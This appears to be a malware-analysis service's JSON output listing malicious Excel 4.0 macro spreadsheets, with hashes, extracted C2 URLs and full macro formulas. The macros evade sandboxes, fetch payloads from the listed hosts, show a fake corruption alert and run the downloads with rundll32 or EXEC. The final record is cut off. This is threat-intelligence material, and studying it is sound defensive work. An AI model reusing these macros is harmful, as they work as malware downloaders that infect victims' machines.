{"version":"0.2","sample":{"sample":"","kind":"file","target":"8ed3d2306904f741a7b3c5694ee52582d4cef4edcd58103ec1004436e08cc4a0"},"analysis":{"reported":"2020-04-09T16:17:39Z","score":10},"files":[{"filename":"8ed3d2306904f741a7b3c5694ee52582d4cef4edcd58103ec1004436e08cc4a0","filesize":219136,"md5":"379d625a22a303e6b3060d4d9cb86ab1","sha1":"f3a07598aba73e0d22420cbd01d12c3bf1bf8015","sha256":"8ed3d2306904f741a7b3c5694ee52582d4cef4edcd58103ec1004436e08cc4a0","sha512":"d34641c6ff12f42db0387b6409428615fbcef8858a703c20e82b15f2dee52ee0e755e8385b32ef9ee078e9507752d409f454bc5d98172a74550c8838c7d2d921","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8ed3d2306904f741a7b3c5694ee52582d4cef4edcd58103ec1004436e08cc4a0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://kacper-formela.pl/wp-smart.php","http://braeswoodfarmersmarket.com/wp-smart.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://kacper-formela.pl/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://braeswoodfarmersmarket.com/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bqg85ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"w75mosBsZw\",TRUE)\nGOTO(R$1C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8ee9f1df77288f5222ea8b7a638836250cb0bf372c520667a22326a14e30c6d7"},"analysis":{"reported":"2020-04-09T16:17:39Z","score":10},"files":[{"filename":"8ee9f1df77288f5222ea8b7a638836250cb0bf372c520667a22326a14e30c6d7","filesize":132608,"md5":"314c22f01a44db812f9a1cd1ed6cc4f0","sha1":"271885bef0435413770e9e3966b8d04f78862445","sha256":"8ee9f1df77288f5222ea8b7a638836250cb0bf372c520667a22326a14e30c6d7","sha512":"32d415543d0457290746d8cfa1ba0be1eb38c769cfdb74a514256b1c472256637df06a00e7b9c681603ba09ccc58b9cca676dcc59fee0340741ee9f9dc065867","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8ee9f1df77288f5222ea8b7a638836250cb0bf372c520667a22326a14e30c6d7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"xAawiGrGkI\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8eef0a4b4844409c68506a04715feeeb0b482980d503b527759bad21a419f45e"},"analysis":{"reported":"2020-04-09T16:17:39Z","score":10},"files":[{"filename":"8eef0a4b4844409c68506a04715feeeb0b482980d503b527759bad21a419f45e","filesize":170496,"md5":"f821a0232a378d4f8d94e368cdc52a85","sha1":"5ad960bb9c3e92e22164321af58b2fc40598bbf0","sha256":"8eef0a4b4844409c68506a04715feeeb0b482980d503b527759bad21a419f45e","sha512":"a6efceb423abebca5ef2fdbbd2e6ec621fc9d4e7b2dc4160550de4d5b1c335e2cf878836c237c9dc49c24a3b161265c382d65dea0595e38026e21d6c9d4a7fb6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8eef0a4b4844409c68506a04715feeeb0b482980d503b527759bad21a419f45e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gk6XfaqsY0\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8f0133ee567962684876ea09deba6b25e4cf1e27e3fe23389758bd7065728346"},"analysis":{"reported":"2020-04-09T16:17:39Z","score":10},"files":[{"filename":"8f0133ee567962684876ea09deba6b25e4cf1e27e3fe23389758bd7065728346","filesize":214528,"md5":"74a43cb853c5059f1f57e0a6edd74a2c","sha1":"26e004c9c3b3c5f711dbf7430f59d6d26fc7e59d","sha256":"8f0133ee567962684876ea09deba6b25e4cf1e27e3fe23389758bd7065728346","sha512":"4367eda828c72550a2eacd105dedc94f5e327fd51f299b90393f676871b2776637362c4ddb4293c3de236dd40eee9c0e539fb9030c240943caf3cfcc798a75e9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8f0133ee567962684876ea09deba6b25e4cf1e27e3fe23389758bd7065728346.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"EYiUEba9N4\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8f05a5a15d15273943ac8fc61aaadf8e0e69acc2f8a70507e70bcfd47ccacd63"},"analysis":{"reported":"2020-04-09T16:17:39Z","score":10},"files":[{"filename":"8f05a5a15d15273943ac8fc61aaadf8e0e69acc2f8a70507e70bcfd47ccacd63","filesize":206336,"md5":"3ecf95e81174baeb92b45c63da4df54e","sha1":"046d6871905558a27eac4c91d4126c8ba7324a3f","sha256":"8f05a5a15d15273943ac8fc61aaadf8e0e69acc2f8a70507e70bcfd47ccacd63","sha512":"974ca04b58886bf2efad4f63b8e15ee9441ba850f05190bf8fbf74a6e960042eb741ad650064577d2502c6e2f1f6bb8160a07e058266208a11dee96a23e28be4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8f05a5a15d15273943ac8fc61aaadf8e0e69acc2f8a70507e70bcfd47ccacd63.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"7FBoQZafHT\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8f0e257c8927914f706cf5a31d0b851f40975a5aae01553bc1e130529b752ba6"},"analysis":{"reported":"2020-04-09T16:17:39Z","score":10},"files":[{"filename":"8f0e257c8927914f706cf5a31d0b851f40975a5aae01553bc1e130529b752ba6","filesize":167936,"md5":"aef7ef725af7963319665934ec7921c4","sha1":"0097d4b1b3621ee18bea8ecc07982cdb42c00dfe","sha256":"8f0e257c8927914f706cf5a31d0b851f40975a5aae01553bc1e130529b752ba6","sha512":"c738552905241f8fd43da561113448af7eb3a83b01fcc25c41aa06a93d9980dd4e970c96df74192d884011b8c9d1c95a39e5c758c83d0fca24006974fd6f7ad9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8f0e257c8927914f706cf5a31d0b851f40975a5aae01553bc1e130529b752ba6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"iXe7KuAs5F\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8f1017560e27bcedc752798201a5f429c596d1d7f7190e08beac1545eaf69567"},"analysis":{"reported":"2020-04-09T16:17:39Z","score":10},"files":[{"filename":"8f1017560e27bcedc752798201a5f429c596d1d7f7190e08beac1545eaf69567","filesize":116224,"md5":"9cc52028fc09a5f39f2d27900a50f5fe","sha1":"067c4a5d288f2a0a3449f57f8da4a20bac0e2259","sha256":"8f1017560e27bcedc752798201a5f429c596d1d7f7190e08beac1545eaf69567","sha512":"784c41c8a88ce923ee42c94d03bc47ab89cd42993057b96d649c3b5d3da45843e92a74fdf5aaf2a5508454aba0824fe43eed33953696fc51d0b6e5d900587e0f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8f1017560e27bcedc752798201a5f429c596d1d7f7190e08beac1545eaf69567.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"QnXPX3VWSF\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8f1079dbf517ed1f503f3a371c9da3b66fea908fe18abec79d0e882e79dbb636"},"analysis":{"reported":"2020-04-09T16:17:39Z","score":10},"files":[{"filename":"8f1079dbf517ed1f503f3a371c9da3b66fea908fe18abec79d0e882e79dbb636","filesize":185344,"md5":"910ec6a20fd71968e208a7d6d9128a1f","sha1":"d0b2a496679e72eb6b16be7359e4b52ddaaf3719","sha256":"8f1079dbf517ed1f503f3a371c9da3b66fea908fe18abec79d0e882e79dbb636","sha512":"9cc75ee7df247c4f5bf6c21ebf148083f87a6b25b4751ec6876d9e02ca88eac0772d920e8b1117c6ea087ab4abc656d381991d598eeccf4ec227fdfc6170fd25","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8f1079dbf517ed1f503f3a371c9da3b66fea908fe18abec79d0e882e79dbb636.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8f124fb15e329813fe819d6bbcb021ae1f1263c62f92b31341730eb09a861c20"},"analysis":{"reported":"2020-04-09T16:17:39Z","score":10},"files":[{"filename":"8f124fb15e329813fe819d6bbcb021ae1f1263c62f92b31341730eb09a861c20","filesize":182784,"md5":"338ac9e5bb10e04982750efa8562b80c","sha1":"44e04f23b2d21fcdb1a7464dd12c997d15c826e8","sha256":"8f124fb15e329813fe819d6bbcb021ae1f1263c62f92b31341730eb09a861c20","sha512":"e8b70efce1ee778bd1eff668be81395c0c555653a213c7bc8c4de0f739d1d9c222188f8025326adc9aab12c037f3eaccd013473f56b49286cfccbaa6be6b3ce8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8f124fb15e329813fe819d6bbcb021ae1f1263c62f92b31341730eb09a861c20.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://g2creditsolutions.com/trusty/444444.png","http://lorrainehomeconsulting.com/wp-content/uploads/2020/02/trusty/187213.png"],"attr":{"formulas":"ERROR(FALSE)\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://g2creditsolutions.com/trusty/444444.png\",\"c:\\Users\\Public\\1.exe\",0,0)\nIF(R$1C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://lorrainehomeconsulting.com/wp-content/uploads/2020/02/trusty/187213.png\",\"c:\\Users\\Public\\1.exe\",0,0),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\1.exe\")\nCLOSE(FALSE)\nWORKBOOK.HIDE(\"SDJKv3\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8f1332f9fd3a95def0f31706f49749837514fb89c3713f00b30ae8fbe72a8e9b"},"analysis":{"reported":"2020-04-09T16:17:39Z","score":10},"files":[{"filename":"8f1332f9fd3a95def0f31706f49749837514fb89c3713f00b30ae8fbe72a8e9b","filesize":167936,"md5":"4bd58d19b36a8d102f40c772e7466cf6","sha1":"9f2d213309778f0cf424ada23185ce0eb9763f8b","sha256":"8f1332f9fd3a95def0f31706f49749837514fb89c3713f00b30ae8fbe72a8e9b","sha512":"ae3f452b0ab0c06a347dc0f08334382a410a8d3b402925eac49176040511190eb0d95aad4685b2354fbb1bae32ce46a4ee8a792c9bc1bf4b86bc99c2c690f0fa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8f1332f9fd3a95def0f31706f49749837514fb89c3713f00b30ae8fbe72a8e9b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"DUltnfJBNw\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8f1b654d36bceb741feb52e64dfa16086a4b273f9b2779ea83224daf01c9c46b"},"analysis":{"reported":"2020-04-09T16:17:39Z","score":10},"files":[{"filename":"8f1b654d36bceb741feb52e64dfa16086a4b273f9b2779ea83224daf01c9c46b","filesize":116224,"md5":"cb74d1b007f6f121f73c981c533e45c3","sha1":"3c382908965abca05765ccaab62df3290ed3ffcf","sha256":"8f1b654d36bceb741feb52e64dfa16086a4b273f9b2779ea83224daf01c9c46b","sha512":"22007fc4d007189ec832e831cf9ec9a10d3e5af502b3b85a95661858d1e40d96883d84010ee8287d04ffee77c8a2837e0d8e4c3f3345dcc3f5688eca29e4bf64","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8f1b654d36bceb741feb52e64dfa16086a4b273f9b2779ea83224daf01c9c46b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"FJtrxcB5xh\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8f2bfb1f9d366f338947418991f38f97e49ebce4c6507ded25e667102db4b1cb"},"analysis":{"reported":"2020-04-09T16:17:39Z","score":10},"files":[{"filename":"8f2bfb1f9d366f338947418991f38f97e49ebce4c6507ded25e667102db4b1cb","filesize":206336,"md5":"b8c872236561e4f0663b3406518c0371","sha1":"55baee1a58dee1b9811d4135e278c6f3d4aec5c9","sha256":"8f2bfb1f9d366f338947418991f38f97e49ebce4c6507ded25e667102db4b1cb","sha512":"20e8cf3e0c907484a26c3a7744ba63c51bb6cccd92027682e3968891f8648f43943da6c6d493078b74675c20e68d85ed9dc4669212d76804ef9314ccc0d66a07","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8f2bfb1f9d366f338947418991f38f97e49ebce4c6507ded25e667102db4b1cb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gwzPB1XaHR\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8f3b8a8f325694f09dbd72eafd91a6cf1669d1607926347e2f175e5bc395e056"},"analysis":{"reported":"2020-04-09T16:17:39Z","score":10},"files":[{"filename":"8f3b8a8f325694f09dbd72eafd91a6cf1669d1607926347e2f175e5bc395e056","filesize":169472,"md5":"29840c47a48681f81974dcd7842f1c75","sha1":"1641ea24b9324fda0267244dd5a238f69f1cd0e3","sha256":"8f3b8a8f325694f09dbd72eafd91a6cf1669d1607926347e2f175e5bc395e056","sha512":"402a80f2d7721514017f445451c35293bc5e3562ce0ad365db6fa178661be3529ce73809cc12595de741c16932925041440bd546eba785d40ae4681c2ad21f32","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8f3b8a8f325694f09dbd72eafd91a6cf1669d1607926347e2f175e5bc395e056.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"2wR14DcslJ\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8f460b9773b6695056fa0798a2e7ef1d98762453969564ee24621c23bbe1d896"},"analysis":{"reported":"2020-04-09T16:17:39Z","score":10},"files":[{"filename":"8f460b9773b6695056fa0798a2e7ef1d98762453969564ee24621c23bbe1d896","filesize":214528,"md5":"fa841c7a41b5bdba64fbac6104a3ea9f","sha1":"e17e16921cba76b878316ef0363cec6196482617","sha256":"8f460b9773b6695056fa0798a2e7ef1d98762453969564ee24621c23bbe1d896","sha512":"103aa87fdd6c196b7a0103d6d20aba1ff6f4df3517f8837636eca36759028087ee428a754a257204d2392f04e09289f5cbf4c623f23b1a6a6349b3641cc74629","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8f460b9773b6695056fa0798a2e7ef1d98762453969564ee24621c23bbe1d896.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's 